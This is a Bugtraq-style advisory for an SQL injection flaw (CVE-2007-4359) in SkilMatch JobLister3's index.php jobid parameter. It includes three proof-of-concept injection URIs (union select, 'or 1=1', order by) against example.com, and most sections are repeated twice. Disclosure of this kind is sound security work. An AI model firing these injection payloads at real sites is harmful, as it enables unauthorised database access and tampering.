SkilMatch Systems JobLister3 Index.PHP SQL Injection Vulnerability
BID:25296
Info
SkilMatch Systems JobLister3 Index.PHP SQL Injection Vulnerability
| Bugtraq ID: | 25296 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-4359 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 13 2007 12:00AM |
| Updated: | May 07 2015 05:36PM |
| Credit: | [email protected] is credited with the discovery of this vulnerability. |
| Vulnerable: |
SkilMatch Systems JobLister3 0 |
| Not Vulnerable: | |
Discussion
SkilMatch Systems JobLister3 Index.PHP SQL Injection Vulnerability
JobLister3 is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
JobLister3 is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Exploit / POC
SkilMatch Systems JobLister3 Index.PHP SQL Injection Vulnerability
An attacker can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?mode=showbyID&jobid=99786'%20union%20all%20select%20something%20from%20something/*
http://www.example.com/index.php?mode=showbyID&jobid=99786'%20or%201=1/*
http://www.example.com/index.php?mode=showbyID&jobid=99786'%20order%20by%2016/*
An attacker can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?mode=showbyID&jobid=99786'%20union%20all%20select%20something%20from%20something/*
http://www.example.com/index.php?mode=showbyID&jobid=99786'%20or%201=1/*
http://www.example.com/index.php?mode=showbyID&jobid=99786'%20order%20by%2016/*
Solution / Fix
SkilMatch Systems JobLister3 Index.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
SkilMatch Systems JobLister3 Index.PHP SQL Injection Vulnerability
References:
References:
- JobLister3 Home Page (SkilMatch Systems)
- JobLister3 SQL injection vulnerabilities ([email protected])